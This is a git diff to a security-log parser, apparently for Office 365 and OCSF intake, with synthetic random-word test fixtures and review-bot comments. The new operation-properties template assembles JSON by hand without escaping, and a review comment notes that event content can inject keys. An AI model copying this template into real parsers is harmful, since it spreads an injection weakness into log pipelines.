\"loops charm mpegs\", \"ext\": \"pork picked investigations\", \"type_id\": 1, \"parent_folder\": \"approaches malpractice basics/lifetime.dxf\", \"accessed_time\": 1731399707926, \"confidentiality\": \"subjective\", \"confidentiality_id\": 99, \"hashes\": [{\"value\": \"DB1A6CE0E4C6F3924C7CCA74924F4B0EF8BC0031\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"2B9A99087B9991B5EAD9406E2CAC8DA385815E6C3FA4DA96E1487782280E8E82FDBD3536F85994E271610D72C5A62E6F027E0CD37DA05806289882A1440BD441\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}], \"xattributes\": {}}, \"user\": {\"name\": \"Expects\", \"type\": \"System\", \"domain\": \"blade keith manga\", \"uid\": \"290e9ba8-a0cf-11ef-9a18-0242ac110007\", \"type_id\": 3, \"account\": {\"name\": \"swedish ol flexible\", \"type\": \"GCP Account\", \"uid\": \"290ea6ca-a0cf-11ef-9b3b-0242ac110007\", \"type_id\": 5}, \"risk_level\": \"world feelings championships\"}, \"uid\": \"290eadbe-a0cf-11ef-9668-0242ac110007\", \"cmd_line\": \"iowa gear scheduling\", \"created_time\": 1731399707927, \"integrity\": \"Medium\", \"integrity_id\": 3, \"lineage\": [\"maximize associations reynolds\"], \"parent_process\": {\"name\": \"Themes\", \"pid\": 45, \"file\": {\"name\": \"designers.rpm\", \"type\": \"Named Pipe\", \"path\": \"votes year mice/fort.gpx/designers.rpm\", \"uid\": \"290edaaa-a0cf-11ef-aa5d-0242ac110007\", \"ext\": \"keyboards yet ask\", \"type_id\": 6, \"mime_type\": \"motorola/patrick\", \"parent_folder\": \"votes year mice/fort.gpx\", \"created_time\": 1731399707928, \"hashes\": [{\"value\": \"02FA8D46FB2AC65EE42912604250A146AF74C6B8CFF1ACD09BC5F460FB9850CAD2674F76F982ED052C78D178196ED4C10256E2BC50E191DBB82F625CAD071090\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, {\"value\": \"BA1DB3B5141AA0FBF3DD4F6839F49B0B88809121634B4BB39272A838924DDEA2E4D1EBDB9E5F8F8AD90243DBD2A7D2D5497D828BD12E5590FB27483AA1287CD3\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731399707928}, 
\"user\": {\"name\": \"Ongoing\", \"uid\": \"290ee9a0-a0cf-11ef-ac76-0242ac110007\", \"credential_uid\": \"290ef076-a0cf-11ef-adb8-0242ac110007\"}, \"tid\": 6, \"uid\": \"290ef99a-a0cf-11ef-a3ec-0242ac110007\", \"cmd_line\": \"correction weapon gaming\", \"created_time\": 1731399707929, \"parent_process\": {\"name\": \"Voyeurweb\", \"pid\": 45, \"file\": {\"name\": \"varied.php\", \"type\": \"Named Pipe\", \"path\": \"mba francis sony/tend.xml/varied.php\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": true, \"subject\": \"undo nickname stay\", \"issuer\": \"yugoslavia how precisely\", \"fingerprints\": [{\"value\": \"BD87A5FFC4117A0F11094CA6BA6A838013BE215959B7358980553B0360822DD67CACADAFA42D71AB48C4EA3EED5F2491D079661CEB0A7694FFA439EB7743CC04\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"4194D1706ED1F408D5E02D672777019F4D5385C766A8C6CA8ACBA3167D36A7B9\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}], \"created_time\": 1731399707930, \"expiration_time\": 1731399707930, \"serial_number\": \"extraction cabin lions\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0, \"created_time\": 1731399707930}, \"ext\": \"nicholas doing fraud\", \"type_id\": 6, \"mime_type\": \"nextel/himself\", \"parent_folder\": \"mba francis sony/tend.xml\", \"hashes\": [{\"value\": \"21EA6263C16406DFC344CF7CB2A129B97FD2ECF367C828208CBBEDA6599B989F6C2C3DCB1BDF581ABC97201CF64FFBC0D7415F00564F6D80A92C7FFE7037894C\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"7ED6BDBCCADC1CB9DFEA88CA33B6A9346EAE030FF7E9FADD4C23359C0EA7390D\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"security_descriptor\": \"islands interventions removable\", \"xattributes\": {}}, \"user\": {\"name\": \"Soldier\", \"type\": \"User\", \"uid\": \"290f2596-a0cf-11ef-8caf-0242ac110007\", \"type_id\": 1, \"account\": {\"name\": \"ford doug cigarette\", \"type\": \"Mac OS Account\", \"uid\": \"290f3090-a0cf-11ef-9ad3-0242ac110007\", 
\"type_id\": 7}}, \"uid\": \"290f36e4-a0cf-11ef-bdab-0242ac110007\", \"cmd_line\": \"generally alberta anthropology\", \"created_time\": 1731399707931, \"parent_process\": {\"name\": \"Spirits\", \"pid\": 86, \"file\": {\"name\": \"flights.flv\", \"type\": \"Regular File\", \"version\": \"1.3.0\", \"path\": \"str inner working/pose.h/flights.flv\", \"ext\": \"general became bermuda\", \"type_id\": 1, \"parent_folder\": \"str inner working/pose.h\", \"hashes\": [{\"value\": \"DC684E0A948E820C9B32AE34F0E147CCCAEAB3646C95D1FBF6E5EA257B9107251945EB892CD81A3750D89799ADF86C76382C60E73A85B10D110CE39164882C8F\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"CCD823CAF8108F62C012B02D4C233DA76EACF9FDEA959B9DD909ADF1ECC01BD5F184FC7904184E5A6F296850D7102AAF79E8606629B877723DEC951A67E1B193\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731399707932}, \"uid\": \"290f6ac4-a0cf-11ef-bc5e-0242ac110007\", \"cmd_line\": \"sense terrorism hl\", \"created_time\": 1731399707932, \"parent_process\": {\"name\": \"Moving\", \"pid\": 43, \"file\": {\"attributes\": 25, \"name\": \"comparison.pages\", \"owner\": {\"name\": \"Infringement\", \"type\": \"User\", \"uid\": \"290f864e-a0cf-11ef-9828-0242ac110007\", \"groups\": [{\"name\": \"coordinate registration browse\", \"desc\": \"attorney ya walked\", \"uid\": \"290f974c-a0cf-11ef-a918-0242ac110007\"}], \"type_id\": 1, \"risk_level\": \"Critical\", \"risk_level_id\": 4, \"risk_score\": 55, \"uid_alt\": \"licenses cir vacancies\"}, \"type\": \"Unknown\", \"path\": \"lows fc focusing/canvas.pptx/comparison.pages\", \"modifier\": {\"type\": \"User\", \"uid\": \"290fa3ea-a0cf-11ef-b1b2-0242ac110007\", \"groups\": [{\"name\": \"bedroom positions win\", \"desc\": \"amazon feof extras\", \"uid\": \"290fae44-a0cf-11ef-9db8-0242ac110007\"}, {\"name\": \"came swingers colon\", \"uid\": \"290fb646-a0cf-11ef-b3ed-0242ac110007\"}], \"type_id\": 1, \"ldap_person\": {\"employee_uid\": 
\"290fc050-a0cf-11ef-aac9-0242ac110007\", \"job_title\": \"constitutional ricky jonathan\", \"ldap_dn\": \"marketplace ranch counting\"}, \"risk_score\": 0, \"uid_alt\": \"riding indicate wiley\"}, \"ext\": \"specification cialis inherited\", \"type_id\": 0, \"parent_folder\": \"lows fc focusing/canvas.pptx\", \"confidentiality\": \"engineers families bull\", \"hashes\": [{\"value\": \"F081F7B8D4310E67A7572F60B6070A3034D5F1AE1465B3FE4F8DAFCA9213A0E3\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}, {\"value\": \"EAF741D48E0F26CA709BF17829C53A65D420FBD1F01B0F87BDE25230F1FF332E3D2BE89488F8277FA4B22FF53CC04FF382B19F42B7AC34C3EA5A0C0A89B19FCA\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}]}, \"user\": {\"name\": \"Worn\", \"type\": \"Admin\", \"domain\": \"threatening parks application\", \"uid\": \"290fd5fe-a0cf-11ef-ab0d-0242ac110007\", \"type_id\": 2, \"risk_level\": \"High\", \"risk_level_id\": 3}, \"uid\": \"290fde14-a0cf-11ef-9211-0242ac110007\", \"loaded_modules\": [\"/yacht/payday/singer/stretch/hungry.heic\", \"/fa/bumper/represents/studio/shipments.ttf\"], \"cmd_line\": \"shopping appendix deluxe\", \"created_time\": 1731399707935, \"terminated_time\": 1731399707935}, \"xattributes\": {}}, \"xattributes\": {}}, \"terminated_time\": 1731399707935}}, \"terminated_time\": 1731399707935}}}, \"terminated_time\": 1731399707935}, \"sandbox\": \"snowboard lookup done\"}}}}, \"sandbox\": \"broke alternatives excessive\", \"xattributes\": {}}, \"sandbox\": \"mba ambassador shopping\"}}, \"terminated_time\": 1731399707935}}, \"user\": {\"name\": \"Hearing\", \"type\": \"Admin\", \"domain\": \"thinking answered refurbished\", \"uid\": \"290fefee-a0cf-11ef-ba87-0242ac110007\", \"type_id\": 2, \"ldap_person\": {\"email_addrs\": [\"Melodee@automotive.mobi\", \"Lulu@baby.name\"], \"employee_uid\": \"290ffac0-a0cf-11ef-a362-0242ac110007\", \"leave_time\": 1731399707936, \"office_location\": \"podcast cds lloyd\"}, \"risk_level\": \"Low\", \"risk_level_id\": 1, 
\"risk_score\": 22}}, \"severity_id\": 3, \"status_code\": \"present\", \"status_detail\": \"shade accidents alice\", \"status_id\": 2, \"win_service\": {\"name\": \"balance pgp seasonal\", \"version\": \"1.3.0\", \"uid\": \"29101582-a0cf-11ef-a560-0242ac110007\", \"cmd_line\": \"honduras usa fact\", \"service_dependencies\": [\"enhancements occupations cause\", \"sw verification promotion\"], \"service_start_type\": \"Auto\", \"service_start_type_id\": 3, \"service_start_name\": \"golden thumbs crest\"}}", + "event": { + "action": "stop", + "category": [], + "outcome": "failure", + "provider": "foo canada biodiversity", + "reason": "gear technologies garlic", + "severity": 3, + "start": "2024-11-12T08:21:47.936000Z", + "type": [] + }, + "@timestamp": "2024-11-12T08:21:47.936000Z", + "file": { + "directory": "vg tunisia river/favorite.wsf", + "hash": { + "sha1": "9280AE13A255F18D841739D0D18222BB950C8FC7" + }, + "name": "developmental.otf", + "path": "vg tunisia river/favorite.wsf/developmental.otf", + "type": "Regular File" + }, + "host": { + "id": "29092d44-a0cf-11ef-8baa-0242ac110007", + "risk": { + "static_level": "Critical" + }, + "type": "IDS" + }, + "ocsf": { + "activity_id": 4, + "activity_name": "Stop", + "class_name": "Windows Service Activity", + "class_uid": 201004, + "process": { + "parent": { + "user": { + "full_name": "Roland Nichol" + } + }, + "user": { + "domain": "tuition gst cheese", + "full_name": "Lynsey Sherise", + "groups": [ + { + "name": "overview friendly ul" + } + ] + } + } + }, + "process": { + "command_line": "hdtv il murder", + "entity_id": "2909c8d0-a0cf-11ef-82af-0242ac110007", + "name": "Don", + "parent": { + "command_line": "bull retailers sensitivity", + "end": "2024-11-12T08:21:47.935000Z", + "entity_id": "290a756e-a0cf-11ef-86a9-0242ac110007", + "name": "Indoor", + "pid": 29, + "start": "2024-11-12T08:21:47.900000Z", + "user": { + "id": [ + "290a520a-a0cf-11ef-a44f-0242ac110007" + ], + "name": "Asian" + } + }, + "pid": 38, + 
"start": "2024-11-12T08:21:47.895000Z", + "user": { + "id": [ + "2909b99e-a0cf-11ef-946c-0242ac110007" + ], + "name": "Journal" + } + }, + "related": { + "hash": [ + "9280AE13A255F18D841739D0D18222BB950C8FC7" + ], + "user": [ + "Hearing" + ] + }, + "user": { + "domain": "thinking answered refurbished", + "id": "290fefee-a0cf-11ef-ba87-0242ac110007", + "name": "Hearing" + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/test_network_activity_7.json b/OCSF/ocsf/tests/test_network_activity_7.json new file mode 100644 index 000000000..c6192eda7 --- /dev/null +++ b/OCSF/ocsf/tests/test_network_activity_7.json 
@@ -0,0 +1,42 @@ +{ + "input": { + "message": "{\"metadata\":{\"product\":{\"version\":\"5\",\"name\":\"Amazon VPC\",\"feature\":{\"name\":\"Flowlogs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"zone\":\"euw3-az1\",\"provider\":\"AWS\"},\"src_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":\"eni-11111111111111111\",\"vpc_uid\":\"vpc-11111111111111111\",\"instance_uid\":\"-\",\"subnet_uid\":\"subnet-11111111111111111\"},\"dst_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":null,\"vpc_uid\":null,\"instance_uid\":null,\"subnet_uid\":null},\"connection_info\":{\"protocol_num\":null,\"tcp_flags\":null,\"protocol_ver\":\"-\",\"boundary_id\":99,\"boundary\":null,\"direction_id\":99,\"direction\":\"-\"},\"traffic\":null,\"time\":1731529427000,\"time_dt\":1731529427000,\"start_time_dt\":1731529427000,\"end_time_dt\":1731529458000,\"status_code\":\"NODATA\",\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"Network Activity\",\"class_uid\":4001,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_name\":\"Unknown\",\"activity_id\":0,\"action\":\"-\",\"action_id\":99,\"disposition\":\"-\",\"type_uid\":400100,\"type_name\":\"Network Activity: Unknown\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"unmapped\":[[\"sublocation_id\",\"-\"],[\"sublocation_type\",\"-\"]],\"observables\":null}\n", + "sekoiaio": { + "intake": { + "dialect": "OCSF [BETA]", + "dialect_uuid": "a9c959ac-78ec-47a4-924e-8156a77cebf5" + } + } + }, + "expected": { + "message": "{\"metadata\":{\"product\":{\"version\":\"5\",\"name\":\"Amazon 
VPC\",\"feature\":{\"name\":\"Flowlogs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"zone\":\"euw3-az1\",\"provider\":\"AWS\"},\"src_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":\"eni-11111111111111111\",\"vpc_uid\":\"vpc-11111111111111111\",\"instance_uid\":\"-\",\"subnet_uid\":\"subnet-11111111111111111\"},\"dst_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":null,\"vpc_uid\":null,\"instance_uid\":null,\"subnet_uid\":null},\"connection_info\":{\"protocol_num\":null,\"tcp_flags\":null,\"protocol_ver\":\"-\",\"boundary_id\":99,\"boundary\":null,\"direction_id\":99,\"direction\":\"-\"},\"traffic\":null,\"time\":1731529427000,\"time_dt\":1731529427000,\"start_time_dt\":1731529427000,\"end_time_dt\":1731529458000,\"status_code\":\"NODATA\",\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"Network Activity\",\"class_uid\":4001,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_name\":\"Unknown\",\"activity_id\":0,\"action\":\"-\",\"action_id\":99,\"disposition\":\"-\",\"type_uid\":400100,\"type_name\":\"Network Activity: Unknown\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"unmapped\":[[\"sublocation_id\",\"-\"],[\"sublocation_type\",\"-\"]],\"observables\":null}\n", + "event": { + "action": "unknown", + "category": [ + "network" + ], + "end": "2024-11-13T20:24:18Z", + "kind": "event", + "severity": 1, + "start": "2024-11-13T20:23:47Z", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-13T20:23:47Z", + "cloud": { + "account": { + "id": "111111111111" + }, + "availability_zone": "euw3-az1", + "provider": "AWS", + "region": "eu-west-3" + }, + "ocsf": { + "activity_id": 0, + "activity_name": "Unknown", + "class_name": "Network Activity", + "class_uid": 4001 + } + } +} \ No 
newline at end of file diff --git a/Office 365/o365/_meta/fields.yml b/Office 365/o365/_meta/fields.yml index 96bb48e86..dfa4178de 100644 --- a/Office 365/o365/_meta/fields.yml +++ b/Office 365/o365/_meta/fields.yml @@ -408,6 +408,11 @@ office365.logon_error: name: office365.logon_error type: keyword +office365.operation.properties: + description: A list of objects describing the operation + name: office365.operation.properties + type: object + office365.record_type: description: The type of the operation name: office365.record_type @@ -508,6 +513,11 @@ office365.user_type.code: name: office365.user_type.code type: long +office365.user_type.is_external: + description: Whether user is external + name: office365.user_type.is_external + type: boolean + office365.user_type.name: description: The translated type of the user that performed the operation name: office365.user_type.name diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml index 62a4098df..8568883db 100644 --- a/Office 365/o365/ingest/parser.yml +++ b/Office 365/o365/ingest/parser.yml @@ -77,7 +77,7 @@ stages: event.action: "{{json_event.message.Operation}}" event.code: "{{json_event.message.RecordType | string}}" event.reason: "{{json_event.message.ActionName}}" - user.name: "{{json_event.message.UserId}}" + user.name: "{{json_event.message.UserId.removeprefix('urn:spo:guest#')}}" user.id: "{{json_event.message.UserKey}}" organization.id: "{{json_event.message.OrganizationId}}" action.id: "{{json_event.message.RecordType}}" 
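Review bot: The description added for `office365.operation.properties`, "A list of objects describing the operation", does not match the field's shape: it is declared `type: object` and the parser builds it as one mapping keyed by property name (the updated fixtures show `"properties": {"IsThrottled": "False", "MailAccessType": "Bind"}`), so a reader of the schema will expect an array that never appears. Suggest `description: The properties of the operation, as a mapping keyed by property name`. In the second hunk, `office365.user_type.is_external` is described only as "Whether user is external"; since the parser's sole signal is the `urn:spo:guest#` prefix on `UserId`, stating that in the description, e.g. `description: Whether the acting user is a SharePoint/OneDrive guest (UserId carries the urn:spo:guest# prefix)`, tells consumers what the flag actually measures.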
@@ -89,9 +89,12 @@ stages: filter: "{{parse_client_ip.result.ip | is_ipaddress}}" - set: - user.email: "{{json_event.message.UserId}}" + user.email: "{{json_event.message.UserId.removeprefix('urn:spo:guest#')}}" filter: '{{"@" in json_event.message.UserId}}' + - set: + office365.user_type.is_external: "{{'urn:spo:guest#' in json_event.message.UserId}}" + - set: source.ip: "{{parse_client_ip_address.result.ip}}" source.port: "{{parse_client_ip_address.result.port}}" @@ -118,6 +121,21 @@ stages: office365.audit.object_id: "{{json_event.message.ObjectId}}" office365.virus_info: "{{json_event.message.VirusInfo}}" office365.virus_vendor: "{{json_event.message.VirusVendor}}" + - set: + office365.operation.properties: > + { + {%- for property in json_event.message.OperationProperties -%} + {%- if property.Value != null -%} + {%- if property.Value | from_json == None -%} + "{{property.Name}}":"{{property.Value}}", + {%- else -%} + "{{property.Name}}": {{property.Value | from_json}}, + {%- endif -%} + {%- endif -%} + {%- endfor -%} + } + filter: '{{json_event.message.get("OperationProperties") != None}}' + - translate: dictionary: 0: "Regular" @@ -164,6 +182,10 @@ stages: filter: '{{json_event.message.get("Parameters") != None}}' - set: office365.context.aad_session_id: "{{json_event.message.SessionId}}" + office365.context.client.id: "{{json_event.message.ClientAppId}}" + - set: + office365.context.client.id: "{{json_event.message.AppId}}" + filter: '{{json_event.message.get("ClientAppId") == ""}}' parse_exchange_item: actions: @@ -189,6 +211,7 @@ stages: user.id: "{{json_event.message.LogonUserSid}}" office365.exchange.mailbox_guid: "{{json_event.message.MailboxGuid}}" office365.context.aad_session_id: "{{json_event.message.SessionId}}" + office365.context.client.id: "{{json_event.message.ClientAppId}}" - set: email.subject: "{{json_event.message.Item.Subject}}" email.message_id: "{{json_event.message.Item.InternetMessageId[1:-1]}}" 
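Review bot: `office365.user_type.is_external` is derived with a substring test, `'urn:spo:guest#' in json_event.message.UserId`, while `user.email` here and `user.name` in the preceding hunk (`@@ -77`) strip the marker with `removeprefix`, which only acts on a leading prefix; a UserId carrying the marker anywhere but at the start would be flagged external yet keep the unstripped value. Aligning the two, `office365.user_type.is_external: "{{json_event.message.UserId.startswith('urn:spo:guest#')}}"`, keeps the flag and the stripped identity consistent. This `set` also has no filter, so the key is emitted on every record (the fixture updates reflect that); that is fine as long as consumers treat a boolean `false`, not absence, as "internal".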
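Review bot: The `office365.operation.properties` template assembles JSON by hand, writing `"{{property.Name}}":"{{property.Value}}"` with no escaping, so a property whose name or value contains a double quote or backslash yields a malformed object, and a value can close the string early and introduce keys of its own — inbox-rule names and conditions are set by the mailbox owner, so event content controls this text. The `else` branch renders the parsed value with `{{property.Value | from_json}}`, i.e. Python's repr (single-quoted), and the loop leaves a trailing comma before the closing brace, so the rendered text is not strict JSON and only works because the engine's loader is lenient (the fixtures pass, so it evidently is). If the engine exposes Jinja's built-in `tojson` filter (`from_json` here is custom, so worth confirming), emitting `{{property.Name | tojson}}: {{property.Value | tojson}},` in the string branch and `{{property.Name | tojson}}: {{property.Value | from_json | tojson}},` in the other produces correctly escaped output whatever the content. Separately, any value that parses as JSON is re-typed, so numeric-looking identifiers such as `RuleId` become integers (the fixture expects `-123`) while others stay strings, and the same property may carry different types across events; a short comment on the `set` saying this is intended would help. The enclosing stage's action list starts outside the hunk.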
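Review bot: The fallback to `AppId` is guarded by `json_event.message.get("ClientAppId") == ""`, which is only true when the key is present and empty; when `ClientAppId` is absent, `get` returns None, the first `set` renders an empty `office365.context.client.id`, and the fallback never fires. If `AppId` is meant to cover a missing as well as a blank `ClientAppId`, `filter: '{{not json_event.message.get("ClientAppId")}}'` handles both cases. The later hunks at `@@ -189`, `@@ -237` and `@@ -254` set `client.id` from `ClientAppId` alone with no `AppId` fallback; if that asymmetry is intended, a one-line comment next to those `set` entries would save the next reader from reconciling the two paths.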
@@ -237,6 +260,7 @@ stages: ] - set: office365.context.aad_session_id: "{{json_event.message.SessionId}}" + office365.context.client.id: "{{json_event.message.ClientAppId}}" parse_share_point: actions: - set: @@ -254,6 +278,7 @@ stages: actions: - set: office365.context.aad_session_id: "{{json_event.message.SessionId}}" + office365.context.client.id: "{{json_event.message.ClientAppId}}" parse_network_traffic: actions: diff --git a/Office 365/o365/tests/ad.json b/Office 365/o365/tests/ad.json index 4cfb5c636..359da7dbc 100644 --- a/Office 365/o365/tests/ad.json +++ b/Office 365/o365/tests/ad.json @@ -44,6 +44,7 @@ "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/ad_1.json b/Office 365/o365/tests/ad_1.json index 2474aeae8..aa501f91a 100644 --- a/Office 365/o365/tests/ad_1.json +++ b/Office 365/o365/tests/ad_1.json @@ -53,6 +53,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/add_member_to_role.json b/Office 365/o365/tests/add_member_to_role.json index 2ea3b7995..15b06db18 100644 --- a/Office 365/o365/tests/add_member_to_role.json +++ b/Office 365/o365/tests/add_member_to_role.json @@ -57,6 +57,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/automated_investigation_and_response.json b/Office 365/o365/tests/automated_investigation_and_response.json index bb5f028e8..3ae14890a 100644 --- a/Office 365/o365/tests/automated_investigation_and_response.json +++ b/Office 365/o365/tests/automated_investigation_and_response.json @@ -50,6 +50,7 @@ "record_type": 64, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, 
diff --git a/Office 365/o365/tests/automated_investigation_and_response_1.json b/Office 365/o365/tests/automated_investigation_and_response_1.json index fb46179f0..b79920afb 100644 --- a/Office 365/o365/tests/automated_investigation_and_response_1.json +++ b/Office 365/o365/tests/automated_investigation_and_response_1.json @@ -145,6 +145,7 @@ "record_type": 64, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields.json b/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields.json index 6e6d8fd0f..e40af7314 100644 --- a/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields.json +++ b/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields.json @@ -95,6 +95,7 @@ "record_type": 64, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json b/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json index a3a57df24..ca940465a 100644 --- a/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json +++ b/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json @@ -121,6 +121,7 @@ "record_type": 64, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/automated_investigation_and_response_with_attachment.json b/Office 365/o365/tests/automated_investigation_and_response_with_attachment.json index 61b656511..173b1ef9c 100644 --- a/Office 365/o365/tests/automated_investigation_and_response_with_attachment.json +++ b/Office 365/o365/tests/automated_investigation_and_response_with_attachment.json @@ -108,6 +108,7 @@ "record_type": 64, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, 
diff --git a/Office 365/o365/tests/browser_log.json b/Office 365/o365/tests/browser_log.json index 611865bee..5bd149008 100644 --- a/Office 365/o365/tests/browser_log.json +++ b/Office 365/o365/tests/browser_log.json @@ -29,6 +29,7 @@ "record_type": 36, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/clientipadress.json b/Office 365/o365/tests/clientipadress.json index c20107759..661fe2bb6 100644 --- a/Office 365/o365/tests/clientipadress.json +++ b/Office 365/o365/tests/clientipadress.json @@ -23,10 +23,22 @@ "target": "user" }, "office365": { + "context": { + "client": { + "id": "clientappidxxxx-xxx-xxx-xxxx" + } + }, + "operation": { + "properties": { + "IsThrottled": "False", + "MailAccessType": "Bind" + } + }, "record_type": 50, "result_status": "Succeeded", "user_type": { "code": 5, + "is_external": false, "name": "Application" } }, diff --git a/Office 365/o365/tests/compliancemanager-scorechange.json b/Office 365/o365/tests/compliancemanager-scorechange.json index 9e31750bf..cc75e8e2c 100644 --- a/Office 365/o365/tests/compliancemanager-scorechange.json +++ b/Office 365/o365/tests/compliancemanager-scorechange.json @@ -22,6 +22,7 @@ "result_status": "Successful", "user_type": { "code": 2, + "is_external": false, "name": "Admin" } }, diff --git a/Office 365/o365/tests/email_reported.json b/Office 365/o365/tests/email_reported.json index e9b064f62..69696b1c5 100644 --- a/Office 365/o365/tests/email_reported.json +++ b/Office 365/o365/tests/email_reported.json @@ -39,6 +39,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/exchange_event1.json b/Office 365/o365/tests/exchange_event1.json index 881c1f21b..334ec01a8 100644 --- a/Office 365/o365/tests/exchange_event1.json +++ b/Office 365/o365/tests/exchange_event1.json 
@@ -39,6 +39,7 @@ "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/exchange_item_aggregated.json b/Office 365/o365/tests/exchange_item_aggregated.json index 11cbfdefc..dc81df845 100644 --- a/Office 365/o365/tests/exchange_item_aggregated.json +++ b/Office 365/o365/tests/exchange_item_aggregated.json @@ -20,10 +20,17 @@ "context": { "aad_session_id": "dcdad6b2-f279-48c6-9ed8-3df0ffde4ece" }, + "operation": { + "properties": { + "IsThrottled": "False", + "MailAccessType": "Bind" + } + }, "record_type": 50, "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/exchange_item_group.json b/Office 365/o365/tests/exchange_item_group.json index 75fe23b37..2a7d13867 100644 --- a/Office 365/o365/tests/exchange_item_group.json +++ b/Office 365/o365/tests/exchange_item_group.json @@ -40,6 +40,7 @@ "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/exchange_item_group_2.json b/Office 365/o365/tests/exchange_item_group_2.json index 1af2cd661..cfbc956e6 100644 --- a/Office 365/o365/tests/exchange_item_group_2.json +++ b/Office 365/o365/tests/exchange_item_group_2.json @@ -93,6 +93,7 @@ "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/exchange_item_update.json b/Office 365/o365/tests/exchange_item_update.json index ad69be989..608d46063 100644 --- a/Office 365/o365/tests/exchange_item_update.json +++ b/Office 365/o365/tests/exchange_item_update.json @@ -29,6 +29,11 @@ "subject": "HI" }, "office365": { + "context": { + "client": { + "id": "037fd006-a72b-49ae-4bb0-08dba30c8729" + } + }, "exchange": { "mailbox_guid": "8208550a-4001-439d-a9f6-e95d76767507" }, 
@@ -36,6 +41,7 @@ "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/external_user.json b/Office 365/o365/tests/external_user.json new file mode 100644 index 000000000..fd3e6c34f --- /dev/null +++ b/Office 365/o365/tests/external_user.json 
@@ -0,0 +1,102 @@ +{ + "input": { + "message": "{\"AppAccessContext\": {\"ClientAppName\": \"MeTA\", \"CorrelationId\": \"27de65c0-1c43-4d70-9a4d-45a66418dbd6\"}, \"CreationTime\": \"2024-11-29T12:31:12\", \"Id\": \"609745a8-8ec0-4305-8607-fa95f45cf370\", \"Operation\": \"FileDownloaded\", \"OrganizationId\": \"eda474c4-ddfd-4ecd-85ff-3103a09b118d\", \"RecordType\": 6, \"UserKey\": \"urn:spo:guest:hash#aGVsbG8gdGhlcmUK\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"OneDrive\", \"ClientIP\": \"1.2.3.4\", \"UserId\": \"urn:spo:guest#john.doe@example.com\", \"AuthenticationType\": \"OAuth\", \"BrowserName\": \"\", \"BrowserVersion\": \"\", \"CorrelationId\": \"27de65c0-1c43-4d70-9a4d-45a66418dbd6\", \"DoNotDistributeEvent\": true, \"EventSource\": \"SharePoint\", \"GeoLocation\": \"EUR\", \"IsManagedDevice\": false, \"ItemType\": \"File\", \"ListId\": \"56391ee5-91aa-44f9-810e-a5dc47abbb02\", \"ListItemUniqueId\": \"1d91eda8-2918-42f0-8f2b-88dd9aaffcdf\", 